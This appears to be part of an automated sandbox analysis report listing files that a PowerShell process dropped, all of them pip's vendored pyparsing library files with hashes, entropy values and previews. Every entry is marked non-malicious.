                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9116
                                                                                                    Entropy (8bit):4.974975272378704
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:QwQHTFk4g4LXEKMPtUJHJkh8iJFMYy5hwJVcTFA+YpaZVT17t3gkHwt:TKGDYEBPtr/vPy5hwJSTFgpaZVT1tgky
                                                                                                    MD5:54BDE372F6FA7D187103AB99F7F41E16
                                                                                                    SHA1:8278D2C0279CD14EB27B1F487BBE415B7E7E620D
                                                                                                    SHA-256:F66D496C4D894CB7411B431BE81D2511A663D7CD56C7972E3D7669B1B1C46201
                                                                                                    SHA-512:3E4ACA49007B813DCC513BCA0FA7F20D516C1B2A722B46FB0750698E953B4A7D6F7DA926311561104839D51E6B583ECDB19BD8DEECB49E656A599CF5C304756B
                                                                                                    Malicious:false
                                                                                                    Preview:# module pyparsing.py.#.# Copyright (c) 2003-2022 Paul T. McGuire.#.# Permission is hereby granted, free of charge, to any person obtaining.# a copy of this software and associated documentation files (the.# "Software"), to deal in the Software without restriction, including.# without limitation the rights to use, copy, modify, merge, publish,.# distribute, sublicense, and/or sell copies of the Software, and to.# permit persons to whom the Software is furnished to do so, subject to.# the following conditions:.#.# The above copyright notice and this permission notice shall be.# included in all copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7922
                                                                                                    Entropy (8bit):5.678046876294754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:649k4g4LXEKMPtUJHJkh8s4Exe1jHLx+MieM:+DYEBPtrj01jrx+M/M
                                                                                                    MD5:D6F224ADE516395DCB687931537BE941
                                                                                                    SHA1:6B8B9D0D373B73E0B3F474B57686D239E7EDEBD0
                                                                                                    SHA-256:C2FD55ABC2DA47258F9348F279B26B772A4F16D2FB9BACAEFF183966F50BAC27
                                                                                                    SHA-512:C06A1421A249FBE7198224099308FAE991527EBF2BA9AEF631E9480B4E4C76503A4E59F4842A036D4EAFDCE3A02040F12D54E97F6A8E0A84BF38EBC8F4CB4F46
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.#........................T.....d.Z.d.d.l.m.Z.....G.d...d.e.........Z...e.d.d.d.d.d.........Z.d.Z.e.j...................Z.e.Z.d.Z.d.d.l.....d.d.l.....d.d.l.....d.d.l.m.Z.m.Z...d.d.l.....d.d.l.....d.d.l.m.Z...d.d.l.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d...e.........v.r.e.Z.d...e.........v.r.e.Z.d...e.........v.r.e.Z.e.e.e.z...z...Z.g.d...Z.y.).a.....pyparsing module - Classes and methods to define and execute parsing grammars.=============================================================================..The pyparsing module is an alternative approach to creating and.executing simple grammars, vs. the traditional lex/yacc approach, or the.use of regular expressions. With pyparsing, you don't need to learn.a new syntax for defining grammars or matching expressions - the parsing.module provides a library of classes that you use to construct the.grammar directly in Python...Here is a program to parse "Hello, World!" (or any greeting of the form.``"<sa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8406
                                                                                                    Entropy (8bit):5.447264799254796
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bMRQ0Dr8Cx+qZ1PnLNXuXVS8/asbSRKScTluFOPhTJJ2M/HgScYGZhM9j74SnVJA:bLKLMJo2XjFYk7Q7u/NGX/T
                                                                                                    MD5:43DBFC8496578F620C03AB968D921D66
                                                                                                    SHA1:36EFA00F88D55BB0B7A3EB905158E310890CA6F4
                                                                                                    SHA-256:C482EC34CD1084F0AD8DCBE4271FF6B1E6FB8B98769C03B993CDDD27563AB59B
                                                                                                    SHA-512:333598A47E3551468727DC7B504F89BB9C1CABC5C93DB5927661C315799933677268E3E9B67FB883E8F8153040E4C84C42B22DE04589F96650B7841DA8543452
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.........Z.d...Z.d...Z.d...Z.d...Z...e.........e._.........d.d...Z...e.e.........d...........Z...e.e.........d...........Z...e.e.........d...........Z...e.e.........d...........Z...e.e.........d...........Z.y.)......)...ParseException)...col..replaced_by_pep8c.....................".....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.y.)...OnlyOncezI. Wrapper for parse actions, to ensure they are only called once.. c.....................8.....d.d.l.m.}.....|.|.........|._.........d.|._.........y.).Nr....)..._trim_arityF)...corer......callable..called)...self..method_callr....s.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyparsing/actions.py..__init__z.OnlyOnce.__init__....s........%..#.K..0................c.....................l.....|.j...................s.|.j...................|.|.|.........}.d.|._.........|.S.t.........|.|.d...........).NTz.OnlyOnce obj called multiple
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13425
                                                                                                    Entropy (8bit):5.728283406249044
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:/u2M/HYVaL/xpkZEzbTg39xnxUMY92Yd8mld3ZH:+AabxpkZEzbTgNLvGDZH
                                                                                                    MD5:248D201A0900CAC4EB567662096926B0
                                                                                                    SHA1:AABF6E54EB3B9D671FC1587B880C56172713B06D
                                                                                                    SHA-256:296723D9C50899E828A73348738C4C65701C1226E9F13B1C1227892180FBB315
                                                                                                    SHA-512:1DFFFF7C0AE04953DB27200AE827D065F51097CB3BD1B8B45BAE83452ADFE75BC44161DA7E25BEE70651A9DA83DDBE1A12E3B3A6B721ACC4A694352EF92B34C8
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfK4.............................d.d.l.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z...e.e.........j...........................D...c.g.c.]...}...e.|.e.........s...|.......c.}.Z.y.c...c.}.w.)......)...*)...DelimitedList..any_open_tag..any_close_tag.....)...datetimec..........................e.Z.d.Z.d.Z...e.e.........Z.....e.e.........Z.....e.e.........j...................d.........j...................e.........Z.....e.e.........j...................d.........j.....................e.e.d.................Z.....e.d.........j...................d.........j...................e.........Z.....e.........j...................e.........d.z.....e.........j...................e.........z...j...................d.........Z...e.j'..................d.............e.e...e...e.d.........j+..........................e.z...........z...z...j...................d.........Z...e.j'..................e.............e.d.........j...................d.........j...................e.........Z.....e.d....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):267719
                                                                                                    Entropy (8bit):5.4925481359095985
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:eYdVmwhqO+MwZo/04nh9xx8ZvOFGY6EXWg+5mLTnYw:3BtTFXV3/R
                                                                                                    MD5:6713869A9D55FEC2CCF56DDA4BFFEC2D
                                                                                                    SHA1:C517E740A84CBB783C0DB2A6214125E6083837A9
                                                                                                    SHA-256:CBB512335E4761F4128B7105A589734AFD1D98EC3C869CB2D099ABB4684A59BD
                                                                                                    SHA-512:4F76B3906418FDFE806674B38C215C15B136AEE72EB3908C3465A83C163F5CA23C720C99A4A932F176659434199EB4C76F5AC41AACD5C9BDB38E77696E5522A1
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.l..............................U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z.m/Z0m1Z1..d.d.l2....d.d.l3....d.d.l4m5Z5m6Z6..d.d.l7m8Z8..e.jr..................Z:e;e<f.Z=e.e>d.f.....e?d.<...e.j...................d.k\..r.d.d.l.mAZA..n...G.d...d.........ZA..G.d...d.e(........ZB..G.d...d.e(........ZC..G.d...d.e.........ZDd.eDd.d.f.d...ZEd.eDd.d.f.d...ZFd.d ..ZG[(d!e.j4..................e;....d"e.j...................e;....d.eIf.d#..ZJ..eJe.j...................e.j...................j...................d$................r...eG..........eNeOePeQeReSeTeUeVeWeXh.ZYe.j...................Z[e.e\e.f.....Z]e.e5e.e5....f.....Z^e.e.g.e.f.....e.e5g.e.f.....e.e\e5g.e.f.....e.e;e\e5g.e.f.....f.....Z_e.e.g.eIf.....e.e5g.eIf.....e.e\e5g.eIf.....e.e;e\e5g.eIf.....f.....Z`e.e;e\d%eag.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13005
                                                                                                    Entropy (8bit):5.301496080596066
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:o8F/iVovk/Q2TXTeScmcrbwSavk/OYLP3kAXnQloP1DTmuu:o8F/iTQ1S3Gblb5MAXn7PpNu
                                                                                                    MD5:411D2C5C93892C49BECB9EA6354DADB7
                                                                                                    SHA1:2EE4D860765BB5BDD5381969A6439B4CFA4E2577
                                                                                                    SHA-256:4DBD8074FF73A76118BD9F98111CF315F4C97D3AA52DE910696BCC9767F11734
                                                                                                    SHA-512:A55E529689835694563EDE640BA138CE3A83CAE834B58D6C372BB9D4CBA1A2009A9481C645C668B83D99E3DC4F355FBCC6598F82C48B2E1FB061A76DC70939D4
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf3%.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.j...................e.j...................e.j...................e.j...................e.j ..........................Z...e.e.j$..........................Z...e.j(..................d.e.z...d.z...........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......N.....)...col..line..lineno.._collapse_string_to_ranges..replaced_by_pep8)...pyparsing_unicodec...........................e.Z.d.Z.y.)...ExceptionWordUnicodeN)...__name__..__module__..__qualname__........lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyparsing/exceptions.pyr....r........s.........r....r....z.([z.]{1,16})|.c...........................e.Z.d.Z.U.d.Z.e.e.d.<...e.e.d.<...e.e.d.<...e.j...................e.d.<...e.j...................e.e.e.j...................e.....f.....e.d.<...d.Z.......d.d.e.d.e.d.e.j..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48512
                                                                                                    Entropy (8bit):5.535368686783821
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:r4xqkg8Bp1U0UHMYDqHCdVozNGwxMAOrKPMntbj34TqQmMxODX/mR:0xO8D6DHTHdVozNGyMHeq2x
                                                                                                    MD5:D0C440B40063469AEC1EAED119B63A03
                                                                                                    SHA1:776BAEBEC7C19F3AE3300B51F7E6B1A06F1E6B39
                                                                                                    SHA-256:175F4DE4E01E0F36E1F29410C95337C31DC7F215694022A2C6B6D4C24D663BE8
                                                                                                    SHA-512:6B9B06E73997F10BB0E30E73E8A2D129F8D9BC555D027E22973975BDFA0A78B73946F422900638811B3B4A853E69C9A4E3A4ED341256B47968DB711330B4218E
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.....d.d.l.m.Z.m.Z.m.Z.m.Z.....dcd.d...d.e.d.e.j...................e.....d.e.j...................e.....d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.......ddd.d.d...d.e.e.j&..................e.....e.f.....d.e.d.e.d.e.d.e.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z...ded.d...d.e.d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d ..Z.d!d"d...e.........f...e.........d#..d$e.e.e.f.....d%e.e.e.f.....d&e.j...................e.....d'e.d(e.d.e.f.d)..Z...e.d*..........e.d+........f.d,..Z.d-e.e.e.f.....d.e.e.e.f.....f.d...Z d-e.e.e.f.....d.e.e.e.f.....f.d/..Z!e.e"d0<...e.e"d1<.....e ..e#e$e%d2z...........jM..................d3................\...Z'Z(e.jR..................jT..................jW..........................D.....c.i.c.]...\...}.}.|.jY..................d4........|.......c.}.}.Z-..e.d5d6j_..................e-........z...d7z...........jM..................d8........Z0d9..Z1..G.d:..d;e2........Z3e.e.e.e.e.e.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34121
                                                                                                    Entropy (8bit):5.3578034256352245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:qL8EfUpFfbxFi57O9euql15LMB8tIRMW1UdK:qgEfgxO7O9euqlHLldW1UdK
                                                                                                    MD5:0020C668F53682EFAAD375F30B8A5B21
                                                                                                    SHA1:C3204F977EF2D12901E80F8762785D4A1351E7C6
                                                                                                    SHA-256:4A33B45F0E0DDEDBA2AF6642B8FD8820FC11D7FFCCDBB6F3E96FAEC2D0CA418D
                                                                                                    SHA-512:E976D301E2CE8B550E1EFA0B735192F217B2203AFE790AED6C6D71BF51FDFA06AFB8FD66C2D6FB43E8C1B65EFDF63CDCF3F78EDCFAA010BE91306404BF700D11
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfDh..............................U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.f.Z.e.e.d.f.....e.d.<.....e.d...d.D.................Z...G.d...d.........Z...G.d...d.........Z...e.j,..................e.............e.j,..................e...........y.)......)...MutableMapping..Mapping..MutableSequence..Iterator..Sequence..ContainerN)...Tuple..Any..Dict..Set..List...str_typec................#.... ...K.....|.]...}.|...........y...w...N..)....0.._s.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyparsing/results.py..<genexpr>r........s............a.....s........r....c.....................J.....e.Z.d.Z.U.e.d.e.f.....e.d.<...d.g.Z.d.d.d.e.f.d...Z.d...Z.d...Z.d...Z.y.)..._ParseResultsWithOffset..ParseResults..tup..p1..p2c...........................|.|.f.|._.........y.r......r....)...selfr....r....s.... r......__init__z _ParseResultsWithOffset.__init__....s........0.".X.........c..................... .....|.j...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17199
                                                                                                    Entropy (8bit):5.438413632012282
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mxnip+k8x5Nb71JoQdBi7fAwNz4ULU6vf6tGukrHMpv/v/qIErc:mxnLpJolRzBvfMGuqo/Hq9rc
                                                                                                    MD5:2ACB3BF32CAF3F7E2548E38E5930B352
                                                                                                    SHA1:00905F5D3C1FD6FCE24AC95CA54E4E06BA69C2A3
                                                                                                    SHA-256:1097E6527FC4F0A0C1D56BFDE41EC24B06FF955993587A78FFAFAE834FF06DC7
                                                                                                    SHA-512:8CEE185449C3B9D21F5695DD88A9835462037E2F1612D4A06EFD18EC1BFFFAAE4FC23654425CDC0B278777FCBBCEA7D9C05793A6A3B806A8E5310B5C8CE23149
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.4........................H.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....G.d...d.........Z.y.)......)...contextmanagerN.....)...ParserElement..ParseException..Keyword..__diag__..__compat__c...........................e.Z.d.Z.d.Z...G.d...d.........Z...G.d...d.........Z.e.............d.d.e.d.e.j...................e.....d.e.j...................e.....d.e.d.e.d.e.j...................e.....d.e.j...................e.....d.e.f.d...........Z.y.)...pyparsing_testzB. namespace class for classes useful in writing unit tests. c.....................4.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)..&pyparsing_test.reset_pyparsing_contexta..... Context manager to be used when writing unit tests that modify pyparsing config values:. - packrat parsing. - bounded recursion parsing. - default whitespace characters.. - default keyword characters. - literal string auto-conversion class. - __diag__ settings.. Example::
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13195
                                                                                                    Entropy (8bit):5.404930062699287
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:H27eq9bn+mGPDqY2xhPVVUksf1c3uI1GNkGFaYAln8WPaRoYw36G075re8APPNYX:H273pxcDM1UxrMwoYZp7LYF8
                                                                                                    MD5:41A84123FB726325DE04B99E9CC82529
                                                                                                    SHA1:4870FDAF1712E1797B9FE270426DDA40402BD595
                                                                                                    SHA-256:371DBF067520D095C6533C44494D58A9C88C8FC71FB80A0E66331795BDE19F4C
                                                                                                    SHA-512:FC6AF5871E3C0412858AAA635AA11FD70AE71765651CFD29FCAB2D35E358AFC848F8E1E4744472E764ACB811FDE0F12B4A7DE85F59C11A6E8C432AA93B382AF8
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.).............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.........Z.e.e.e.e.e.f.....e.e.....f.........Z...G.d...d.........Z...G.d...d.e.........Z.y.)......N)...filterfalse)...List..Tuple..Unionc...........................e.Z.d.Z.d...Z.d...Z.y.)..._lazyclasspropertyc.....................V.....|.|._.........|.j...................|._.........|.j...................|._.........y.).N)...fn..__doc__..__name__)...selfr....s.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyparsing/unicode.py..__init__z._lazyclassproperty.__init__....s.................z.z....................c.....................(...........t.........|...........t...........d.........r!t...........f.d.....j...................d.d...D.................r.i..._.........|.j...................j...................}.|...j...................v.r.|.j...............................j...................|.<.....j...................|.....S.).N.._internc.............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14915
                                                                                                    Entropy (8bit):5.199848002888309
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:0vukHfLsjDxv9xjOfbUTAMQ5xsU2PB/tGxCZU13tvTLxgq/EOkd6MO7Zm:QukHfLmQxsbPBYxC6n4jeZm
                                                                                                    MD5:FE6EED76C6B162F7A9725CDE8C6942BF
                                                                                                    SHA1:8EF545F7D71EB44884A5E2D6AD663024E32C6C89
                                                                                                    SHA-256:139C99704A870D15483AF2E55CD98D800FC462921D112DF71F5F96C0EB1F3DA0
                                                                                                    SHA-512:7148C5D64EE895EE3FA442D148912E98568C2B657F35A37EC50C53AE1D0EB201ED96DEAAC900D969A32FB6B21E58378707110E526089C5FF1CAC996E94187EA7
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.!..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.........Z...e.d.e...........Z...G.d...d.........Z...e.d...........d.e.d.e.d.e.f.d...........Z...e.d...........d.e.d.e.d.e.f.d...........Z...e.d...........d.e.d.e.d.e.f.d...........Z...G.d...d.........Z...G.d...d.........Z...G.d...d.........Z...G.d...d.e.........Z.d.e.d.e.f.d...Z...d#d.e.e.e.e.....f.....d.e.d.e.f.d...Z.d.e d.e f.d...Z!d.e.d e.d.e.f.d!..Z"d e.d.e.e.g.e.f.....f.d"..Z#y.)$.....N)...lru_cache..wraps)...Callable..List..Union..Iterable..TypeVar..cast.\.....C)...boundc.....................r.....e.Z.d.Z.U.d.Z.g.Z.e.e.....e.d.<...g.Z.e.e.....e.d.<...d.Z.e.d...........Z...e.d...........Z...e.d...........Z.y.)...__config_flagsz=Internal class for defining compatibility and debugging flags.._all_names.._fixed_names..configurationc.....................>.....|.|.j...................v.rYt.........j...................|.j.....................d.|...d.|
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6567
                                                                                                    Entropy (8bit):4.704950034201965
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:HIb2SjGNsVS8/asbyQKScTYeFOPhTJJ2M/HgScYGZhl7Zz74SnVJB39uDBvQ:HRNUJyQ28NjFY/Zz7V39utQ
                                                                                                    MD5:97193C1C00ED32DF51CF2E57385B514E
                                                                                                    SHA1:9C417653572B6956BE49AFB31BFED33F25E51E0D
                                                                                                    SHA-256:D39B9A20F3B39C93D0ED5811766182986E2C0E750FB7082FE6A39822A6CBD946
                                                                                                    SHA-512:4F246D6F4178F297B2AD1E613D149BCADF00824401357EF5C84D1140FF2398A7482FB5544313667372A78ABB903B68E4824C7EF6365258349E5F55F5AA6E9C00
                                                                                                    Malicious:false
                                                                                                    Preview:# actions.py..from .exceptions import ParseException.from .util import col, replaced_by_pep8...class OnlyOnce:. """. Wrapper for parse actions, to ensure they are only called once.. """.. def __init__(self, method_call):. from .core import _trim_arity.. self.callable = _trim_arity(method_call). self.called = False.. def __call__(self, s, l, t):. if not self.called:. results = self.callable(s, l, t). self.called = True. return results. raise ParseException(s, l, "OnlyOnce obj called multiple times w/out reset").. def reset(self):. """. Allow the associated parse action to be called once more.. """.. self.called = False...def match_only_at_col(n):. """. Helper method for defining parse actions that require matching at. a specific column in the input text.. """.. def verify_col(strg, locn, toks):. if col(locn, strg) != n:. raise ParseException(
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13387
                                                                                                    Entropy (8bit):4.8693639130340305
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:gAabxpkZEzbTgNfLZcQ0YwZaV1HRWk8nTtp:gpvSNYZqWkop
                                                                                                    MD5:168A86BEE8A62563BD1B46047449F40C
                                                                                                    SHA1:693942EDCC014F997CB8BF451270C01A025B4D0C
                                                                                                    SHA-256:A7EDDCF37139F838E5905DF91B43BDFA48D0469A1E8CFFB6FF3D21C59F9EA25E
                                                                                                    SHA-512:8D0E5D4AE8EF116372B33B54D5039C99896B43EC800A63C8FF71AF3E5C544B5E779A7EDB9BB7EBAD2D7B3DC156B61AA19FC3F8106B9BF30A253DBA242F1D7CA5
                                                                                                    Malicious:false
                                                                                                    Preview:# common.py.from .core import *.from .helpers import DelimitedList, any_open_tag, any_close_tag.from datetime import datetime...# some other useful expressions - using lower-case class name since we are really using this as a namespace.class pyparsing_common:. """Here are some common low-level expressions that may be useful in. jump-starting parser development:.. - numeric forms (:class:`integers<integer>`, :class:`reals<real>`,. :class:`scientific notation<sci_real>`). - common :class:`programming identifiers<identifier>`. - network addresses (:class:`MAC<mac_address>`,. :class:`IPv4<ipv4_address>`, :class:`IPv6<ipv6_address>`). - ISO8601 :class:`dates<iso8601_date>` and. :class:`datetime<iso8601_datetime>`. - :class:`UUID<uuid>`. - :class:`comma-separated list<comma_separated_list>`. - :class:`url`.. Parse actions:.. - :class:`convert_to_integer`. - :class:`convert_to_float`. - :class:`convert_to_date`. - :class:`convert_to_dat
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):224445
                                                                                                    Entropy (8bit):4.478174379962787
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:8K6XzXqrQE0EYwyoy5uXhT2xnPyGGO8WWUe/LYJp2VdcxrF+yPCZjW:bBGGBUe8jLyW
                                                                                                    MD5:2A9FD56192E64C5710762B67AD987F43
                                                                                                    SHA1:5E8FFC7AE9B2BE2FA70C726FCD183ED8D9588CE0
                                                                                                    SHA-256:CAFB9194BA57485F26824F908625B73952EA0FD4F4AEC8FDB5B89B8511F861AC
                                                                                                    SHA-512:F3FF27FE9D6618CD3FC45C3AD3A0C6B2C75B0B568136998CD8FC1C9B758FF03441875C635A79B1447CE8BE11012A56488153AD06572A6FC18076596AA0EC9F6E
                                                                                                    Malicious:false
                                                                                                    Preview:#.# core.py.#..from collections import deque.import os.import typing.from typing import (. Any,. Callable,. Generator,. List,. NamedTuple,. Sequence,. Set,. TextIO,. Tuple,. Union,. cast,.).from abc import ABC, abstractmethod.from enum import Enum.import string.import copy.import warnings.import re.import sys.from collections.abc import Iterable.import traceback.import types.from operator import itemgetter.from functools import wraps.from threading import RLock.from pathlib import Path..from .util import (. _FifoCache,. _UnboundedCache,. __config_flags,. _collapse_string_to_ranges,. _escape_regex_range_chars,. _bslash,. _flatten,. LRUMemo as _LRUMemo,. UnboundedMemo as _UnboundedMemo,. replaced_by_pep8,.).from .exceptions import *.from .actions import *.from .results import ParseResults, _ParseResultsWithOffset.from .unicode import pyparsing_unicode.._MAX_INT = sys.maxsize.str_type: Tuple[type, ...] = (str, bytes)..#.# Copy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24215
                                                                                                    Entropy (8bit):4.458805804079613
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:LLzwwHHRVUeF/RTkSFAX3EQVbCrq614OPtL5cMKrEG6AvS+Cn:LLzwwHx2eF/RTkS6X3EQp21BNcMI/662
                                                                                                    MD5:4D006D53065A73CAEF44E879DC744F0D
                                                                                                    SHA1:6E1A3C885FBC3D5DEC270791AB81C64D9660EC8B
                                                                                                    SHA-256:9F19833A8605F4D5EE2DA198CB4D6D2858E4351796265AC616E24D584893A3CE
                                                                                                    SHA-512:572E8A1E5EF6180967A04460DE9A70465983C379E97C2EB7D4ED51BEE8055C5A7C052B7E5DC260572B5AC90AFB4C3DCAE0CEC3F7849E6CE65712BB78AB0AFE93
                                                                                                    Malicious:false
                                                                                                    Preview:# mypy: ignore-errors.import railroad.from pip._vendor import pyparsing.import typing.from typing import (. List,. NamedTuple,. Generic,. TypeVar,. Dict,. Callable,. Set,. Iterable,.).from jinja2 import Template.from io import StringIO.import inspect...jinja2_template_source = """\.{% if not embed %}.<!DOCTYPE html>.<html>.<head>.{% endif %}. {% if not head %}. <style>. .railroad-heading {. font-family: monospace;. }. </style>. {% else %}. {{ head | safe }}. {% endif %}.{% if not embed %}.</head>.<body>.{% endif %}.{{ body | safe }}.{% for diagram in diagrams %}. <div class="railroad-group">. <h1 class="railroad-heading">{{ diagram.title }}</h1>. <div class="railroad-description">{{ diagram.text }}</div>. <div class="railroad-svg">. {{ diagram.svg }}. </div>. </div>.{% endfor %}.{% if not embed %}.</body>.</html>.{% endif %}."""..template = Template(ji
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26824
                                                                                                    Entropy (8bit):5.1984627697995
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:hGrI3W6twfAPsed+Y0bCe+ItMyo7jyN4OPpFMZrdPB4b:h8I3W6taAPsDpbp6yUjiLSdPBe
                                                                                                    MD5:96D52AF68B2D5F3DED34244E0634E7DF
                                                                                                    SHA1:D5DB69503D6E2B634F15FA36BDD239ACC3F40DFD
                                                                                                    SHA-256:1A3C042D91A8D8616D45654C7B86D29A78DD0C282DF5F5638B66FA14A35D372A
                                                                                                    SHA-512:305B88965C351C0B6EDF639DF54E2CD5F91981DE2866FC36B39C653965ABF76383E8857422BEB4B4EB916F78FC918368A9BB1B2B24E5F96733B2AEC1905EC901
                                                                                                    Malicious:false
